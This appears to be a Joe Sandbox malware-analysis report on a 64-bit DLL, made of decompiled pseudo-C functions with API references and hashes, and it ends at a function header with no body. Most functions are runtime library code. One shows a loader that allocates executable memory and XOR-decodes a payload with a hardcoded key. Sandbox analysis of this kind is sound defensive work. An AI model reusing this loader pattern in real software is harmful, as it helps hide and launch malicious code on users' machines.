type_info::_name_internal_method.LIBCMTD ref: 00007FFD14661982
char_traits.LIBCPMTD ref: 00007FFD146619B8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146619D7
_aligned_msize.LIBCMTD ref: 00007FFD146619EC

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
String ID:
API String ID: 2899389904-0
Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction ID: 62868d3bffd1e7b4325b788330e43bc6c8e83ab98647e72ee2d51d06cbecfdee
Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction Fuzzy Hash: 99218472B1DE8181EB50EBA1E4A12AEA760FBC77F8F000535FA8D4775ADE6CD5508B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD146613A0 Relevance: 7.6, APIs: 5, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00007FFD7FFD146613A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
				void* _v16;
				signed long long _v24;
				long long _v32;
				signed int _v40;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 - 0xffffffff <= 0) goto 0x146613cd;
				E00007FFD7FFD14669764();
				_v24 = _a16 * _a24;
				if (_v24 - 0x1000 < 0) goto 0x14661475;
				_v40 = _a8;
				if ((_v40 & 0x0000001f) == 0) goto 0x14661409;
				E00007FFD7FFD14669764();
				_v16 = _v40 - 8;
				_v32 =  *_v16;
				if (_v32 - _v40 < 0) goto 0x14661435;
				E00007FFD7FFD14669764();
				if (_v40 - _v32 - 8 >= 0) goto 0x14661450;
				E00007FFD7FFD14669764();
				if (_v40 - _v32 - 0x27 <= 0) goto 0x1466146b;
				E00007FFD7FFD14669764();
				_a8 = _v32;
				0x14664184(); // executed
				return __eax / _a24;
			}

0x7ffd146613a0
0x7ffd146613a5
0x7ffd146613aa
0x7ffd146613c6
0x7ffd146613c8
0x7ffd146613d8
0x7ffd146613e6
0x7ffd146613f1
0x7ffd14661402
0x7ffd14661404
0x7ffd14661412
0x7ffd1466141f
0x7ffd1466142e
0x7ffd14661430
0x7ffd14661449
0x7ffd1466144b
0x7ffd14661464
0x7ffd14661466
0x7ffd14661470
0x7ffd1466147a
0x7ffd14661483

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD146613C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD14661404
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD14661430
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD1466144B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFD14661466

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction ID: a827193b2a0201d6341ffead6b6dfd0a3d62b245169605bb7c04aa60d7859141
Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction Fuzzy Hash: A021FC36619F8481EA50DF6AE49019AA7A4F78A7B8F000635FADD43BA9DF3CD1508B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14679510 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFD7FFD14679510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
				long long _v16;
				long long _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t35;
				signed int _t48;
				long long _t63;
				intOrPtr _t64;
				void* _t66;
				void* _t76;
				void* _t77;

				_a16 = __edx;
				_a8 = __rcx;
				_v24 = 0;
				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
				_v16 = _t63;
				_v32 = E00007FFD7FFD146691B8(_t63, _t66, L"64", _t76, _t77);
				_v36 = E00007FFD7FFD146691B8(_t63, _t66, L"4096", _t76, _t77);
				_t35 = E00007FFD7FFD146691B8(_t63, _t66, L"8192", _t76, _t77);
				r9d = _v32;
				r8d = _v36 | _t35;
				VirtualAlloc(??, ??, ??, ??); // executed
				_v24 = _t63;
				if (_v24 != 0) goto 0x1467958f;
				goto 0x146795f4;
				_v40 = 0;
				goto 0x146795a3;
				_v40 = _v40 + 1;
				if (_v40 - _a16 >= 0) goto 0x146795ef;
				_t64 = _v40;
				_v28 =  *(_a8 + _t64) & 0x000000ff;
				asm("cdq");
				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
				 *(_v24 + _v40) = _t48;
				goto 0x14679599;
				return _t48;
			}

0x7ffd14679510
0x7ffd14679514
0x7ffd1467951d
0x7ffd14679526
0x7ffd1467952d
0x7ffd1467953e
0x7ffd1467954e
0x7ffd14679559
0x7ffd1467956e
0x7ffd14679571
0x7ffd14679578
0x7ffd1467957e
0x7ffd14679589
0x7ffd1467958d
0x7ffd1467958f
0x7ffd14679597
0x7ffd1467959f
0x7ffd146795ab
0x7ffd146795ad
0x7ffd146795bb
0x7ffd146795c3
0x7ffd146795de
0x7ffd146795ea
0x7ffd146795ed
0x7ffd146795f8

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD14679578

Strings

8192, xrefs: 00007FFD14679552
*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5, xrefs: 00007FFD14679526
4096, xrefs: 00007FFD14679542

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: AllocVirtual
String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
API String ID: 4275171209-3063897839
Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction ID: 446650238cf4ce4cb6f4fbc043d6f2f52abff4947b4182d02adfa717ba009e71
Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction Fuzzy Hash: 6121FC7271CA418BE764CB24E4A06AAB7A1F7CA768F504136F68E83759DF3CD5448F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD146612B0 Relevance: 6.1, APIs: 4, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFD7FFD146612B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
				long long _v16;
				long long _v24;
				signed long long _v32;
				signed long long _v40;
				void* _t40;
				long long _t54;
				signed long long _t57;
				signed long long _t58;
				void* _t60;

				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				_v40 = 0;
				if (_a8 != 0) goto 0x146612de;
				goto 0x14661397;
				_t42 = __eax % _a16;
				if (0xffffffff - _a8 >= 0) goto 0x146612f8;
				E00007FFD7FFD14664E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
				_v32 = _a8 * _a16;
				if ((_a24 & 0x000000ff) == 0) goto 0x1466137c;
				if (_v32 - 0x1000 < 0) goto 0x1466137c;
				_v24 = _v32 + 0x27;
				_t54 = _v32;
				if (_v24 - _t54 > 0) goto 0x1466133b;
				E00007FFD7FFD14664E7C(_t42, _v24 - _t54, _t54, _t60);
				E00007FFD7FFD14663D6C(_t54, _v24); // executed
				_v16 = _t54;
				E00007FFD7FFD14669764();
				_t57 = _v16 + 0x00000027 & 0xffffffe0;
				_v40 = _t57;
				_t58 = _t57 * 0xffffffff;
				 *((long long*)(_v40 + _t58)) = _v16;
				goto 0x14661392;
				_t40 = E00007FFD7FFD14663D6C(_t58, _v32);
				_v40 = _t58;
				E00007FFD7FFD14669764();
				return _t40;
			}

0x7ffd146612b0
0x7ffd146612b5
0x7ffd146612ba
0x7ffd146612c3
0x7ffd146612d2
0x7ffd146612d9
0x7ffd146612e7
0x7ffd146612f1
0x7ffd146612f3
0x7ffd14661303
0x7ffd1466130f
0x7ffd1466131a
0x7ffd14661325
0x7ffd1466132a
0x7ffd14661334
0x7ffd14661336
0x7ffd14661340
0x7ffd14661345
0x7ffd1466134c
0x7ffd1466135a
0x7ffd1466135e
0x7ffd14661368
0x7ffd14661376
0x7ffd1466137a
0x7ffd14661381
0x7ffd14661386
0x7ffd1466138d
0x7ffd1466139b

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFD146612F3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFD14661336
new.LIBCMT ref: 00007FFD14661340

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction ID: 158fd03a84ecba825b7c167c53516266fad59c8cab0063f9a974961e7b3a268e
Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction Fuzzy Hash: AD21E33261CF85C1E6608B29E09035AB7A4FB8A7B8F000735F6DE46BE9DF6CD5508B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14662970 Relevance: 4.5, APIs: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FFD7FFD14662970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed int _v16;
				char _v48;
				long long _v56;
				signed long long _v64;
				signed int _v72;
				void* _t35;
				void* _t37;
				signed long long _t39;
				signed long long _t40;
				signed long long _t61;

				_t37 = __eflags;
				_t36 = __edx;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v56 = 0xfffffffe;
				_t39 =  *0x146de008; // 0xef3156171c50
				_t40 = _t39 ^ _t61;
				_v16 = _t40;
				_v72 = 0;
				E00007FFD7FFD14661760(__edx,  &_v48);
				E00007FFD7FFD14661490(_t40, _a16);
				_v64 = _t40;
				E00007FFD7FFD146611A0(_a24);
				E00007FFD7FFD14662CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
				E00007FFD7FFD14662E90( &_v48, _a16);
				E00007FFD7FFD14662E60( &_v48, _a24);
				E00007FFD7FFD146616A0(__edx, _v64 + _t40, _a8,  &_v48);
				_v72 = _v72 | 0x00000001;
				return E00007FFD7FFD14663A70(E00007FFD7FFD14661540( &_v48), _t35, _t36, _v16 ^ _t61);
			}

0x7ffd14662970
0x7ffd14662970
0x7ffd14662970
0x7ffd14662975
0x7ffd1466297a
0x7ffd14662983
0x7ffd1466298c
0x7ffd14662993
0x7ffd14662996
0x7ffd1466299b
0x7ffd146629a8
0x7ffd146629b3
0x7ffd146629b8
0x7ffd146629c5
0x7ffd146629dd
0x7ffd146629ec
0x7ffd146629fe
0x7ffd14662a0d
0x7ffd14662a19
0x7ffd14662a3d

APIs

char_traits.LIBCPMTD ref: 00007FFD146629C5
type_info::_name_internal_method.LIBCMTD ref: 00007FFD146629EC
type_info::_name_internal_method.LIBCMTD ref: 00007FFD146629FE

Part of subcall function 00007FFD146616A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146616BC

Part of subcall function 00007FFD14661540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD14661567

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
String ID:
API String ID: 652137993-0
Opcode ID: 64b5ee6111c1e80d1d313e9df5607aec9349095c911cfcd66588a2dc81f66332
Instruction ID: da61d05cb87e465bfa588c870fb024702cdaeb395a62dd5964e6157995106203
Opcode Fuzzy Hash: 64b5ee6111c1e80d1d313e9df5607aec9349095c911cfcd66588a2dc81f66332
Instruction Fuzzy Hash: E1112462618E4181EA50DB25E4A11EBB760FBC67F4F401131F6CE876A9DF3CD1458B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661B40 Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFD7FFD14661B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed char _t23;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFD7FFD14662250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x14661b97;
				E00007FFD7FFD146618F0(__rax, _a8);
				E00007FFD7FFD14661BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
				goto 0x14661be0;
				r8d = 0;
				_t23 = E00007FFD7FFD146622B0(_t31, _a8, _a24); // executed
				if ((_t23 & 0x000000ff) == 0) goto 0x14661bdb;
				E00007FFD7FFD146618F0(_t31, _a8);
				E00007FFD7FFD146611E0(_t31, _a16, _a24);
				return E00007FFD7FFD146623A0(_t31, _a8, _a24);
			}

0x7ffd14661b40
0x7ffd14661b45
0x7ffd14661b4a
0x7ffd14661b67
0x7ffd14661b6e
0x7ffd14661b90
0x7ffd14661b95
0x7ffd14661b97
0x7ffd14661ba4
0x7ffd14661bae
0x7ffd14661bb5
0x7ffd14661bc7
0x7ffd14661be4

APIs

Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466226B
Part of subcall function 00007FFD14662250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661B6E

Part of subcall function 00007FFD146618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661BB5
char_traits.LIBCPMTD ref: 00007FFD14661BC7

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 872432861-0
Opcode ID: 7aa3d2372c1ca0d652da04669d2a978a39a877f23c15b1fa6cc72aa4e53f0d09
Instruction ID: 373707bb43bee686a5c7c6866847b4355d45b707ec9e73dcfd5640a556a9b103
Opcode Fuzzy Hash: 7aa3d2372c1ca0d652da04669d2a978a39a877f23c15b1fa6cc72aa4e53f0d09
Instruction Fuzzy Hash: 9911A26573CE8181EA40DB66E4A14AB6364FBC7BE4F105036FE8E87B5ADE2CD5008B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14663F18 Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FFD7FFD14663F18(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0x146df1a0 & 0x000000ff;
				 *0x146df1a0 =  ==  ? 1 :  *0x146df1a0 & 0x000000ff;
				E00007FFD7FFD14664760(1, _t12, _t17, _t18, _t19, _t20);
				if (E00007FFD7FFD14666AC0() != 0) goto 0x14663f47;
				goto 0x14663f5b; // executed
				E00007FFD7FFD1466A844(_t17); // executed
				if (0 != 0) goto 0x14663f59;
				E00007FFD7FFD14666B1C(0);
				goto 0x14663f43;
				return 1;
			}

0x7ffd14663f2c
0x7ffd14663f2f
0x7ffd14663f35
0x7ffd14663f41
0x7ffd14663f45
0x7ffd14663f47
0x7ffd14663f4e
0x7ffd14663f52
0x7ffd14663f57
0x7ffd14663f60

APIs

__isa_available_init.LIBCMT ref: 00007FFD14663F35
__vcrt_initialize.LIBVCRUNTIME ref: 00007FFD14663F3A

Part of subcall function 00007FFD14666AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFD14666AC4
Part of subcall function 00007FFD14666AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFD14666AC9
Part of subcall function 00007FFD14666AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFD14666ACE

__vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFD14663F52

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
String ID:
API String ID: 3388242289-0
Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction ID: 4c319d555e30f41a64b5fb3183bde4674b8d751bfebcea4c3116725184933578
Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction Fuzzy Hash: 21E04F60F0C98345FE28267135F22F916A40F2B33CF4440BDE89E421C3CE1D78AE6661

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14673F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD14673F70() {
				long long _v24;
				long long _t5;
				intOrPtr _t7;

				_v24 = 0;
				_t7 =  *0x146dfdd8; // 0x180000000
				E00007FFD7FFD14679600(_t5, "fx", _t7, "DllRegisterServer");
				_v24 = _t5;
				ExitProcess(??);
			}

0x7ffd14673f74
0x7ffd14673f84
0x7ffd14673f92
0x7ffd14673f97
0x7ffd14673f9c

APIs

ExitProcess.KERNEL32 ref: 00007FFD14673F9C

Strings

DllRegisterServer, xrefs: 00007FFD14673F7D

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction ID: 7e7f7e7e3e1513f4d6a0f97548dda05d1252fb8ee773a9fdbdb1d944207c2f1d
Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction Fuzzy Hash: F7D01760B19E8281F620AB20E8A53DA23A0BB8B32CF900231D58D42265CF3CD209CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466DEA8 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD1466DEA8(void* __ecx, long long __rbx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed char _t53;
				signed int _t54;
				void* _t73;
				long long _t77;
				intOrPtr _t78;
				void* _t95;
				long _t98;

				_t73 = _t95;
				 *((long long*)(_t73 + 8)) = __rbx;
				 *((long long*)(_t73 + 0x10)) = __rbp;
				 *((long long*)(_t73 + 0x18)) = __rsi;
				 *((long long*)(_t73 + 0x20)) = __rdi;
				r14d = 0;
				_t77 =  *((intOrPtr*)(0x7ffd146df968)) + 2;
				if (_t77 - 1 <= 0) goto 0x1466defb;
				 *0x7FFD146DF978 =  *0x7FFD146DF978 | 0x00000080;
				goto 0x1466df86;
				 *0x7FFD146DF978 = 0x81;
				if (0 == 0) goto 0x1466df1c;
				if (0 == 0) goto 0x1466df15;
				goto 0x1466df21;
				goto 0x1466df21;
				GetStdHandle(_t98);
				_t21 = _t77 + 1; // 0x1
				if (_t21 - 1 <= 0) goto 0x1466df61;
				_t53 = GetFileType(??); // executed
				if (_t53 == 0) goto 0x1466df61;
				_t54 = _t53 & 0x000000ff;
				 *((long long*)(0x7ffd146df968)) = _t77;
				if (_t54 != 2) goto 0x1466df55;
				 *0x7FFD146DF978 =  *0x7FFD146DF978 | 0x00000040;
				goto 0x1466df86;
				if (_t54 != 3) goto 0x1466df86;
				 *0x7FFD146DF978 =  *0x7FFD146DF978 | 0x00000008;
				goto 0x1466df86;
				 *0x7FFD146DF978 =  *0x7FFD146DF978 | 0x00000040;
				 *((long long*)( *0x7FFD1A44D6A8 + 0x28)) = 0xfffffffe;
				_t78 =  *0x146dfd78; // 0x0
				if (_t78 == 0) goto 0x1466df86;
				 *((intOrPtr*)( *((intOrPtr*)(_t98 + _t78)) + 0x18)) = 0xfffffffe;
				if (1 != 3) goto 0x1466dec6;
				return _t54;
			}

0x7ffd1466dea8
0x7ffd1466deab
0x7ffd1466deaf
0x7ffd1466deb3
0x7ffd1466deb7
0x7ffd1466dec3
0x7ffd1466dee7
0x7ffd1466deef
0x7ffd1466def1
0x7ffd1466def6
0x7ffd1466defb
0x7ffd1466df04
0x7ffd1466df09
0x7ffd1466df13
0x7ffd1466df1a
0x7ffd1466df21
0x7ffd1466df2a
0x7ffd1466df32
0x7ffd1466df37
0x7ffd1466df3f
0x7ffd1466df41
0x7ffd1466df44
0x7ffd1466df4c
0x7ffd1466df4e
0x7ffd1466df53
0x7ffd1466df58
0x7ffd1466df5a
0x7ffd1466df5f
0x7ffd1466df61
0x7ffd1466df66
0x7ffd1466df6f
0x7ffd1466df79
0x7ffd1466df7f
0x7ffd1466df8f
0x7ffd1466dfaf

APIs

GetStdHandle.KERNEL32 ref: 00007FFD1466DF21
GetFileType.KERNELBASE ref: 00007FFD1466DF37

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
Instruction ID: 9dbb6f6867c2e806a49f1b7ba56dea77d14b2710448d4aa74d46aff487af293b
Opcode Fuzzy Hash: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
Instruction Fuzzy Hash: 2A317231B18F4691F7608B2595E01B86651FB57BB8B680339EB6E473E0CF38E4A2C341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466A9DC Relevance: 3.0, APIs: 2, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

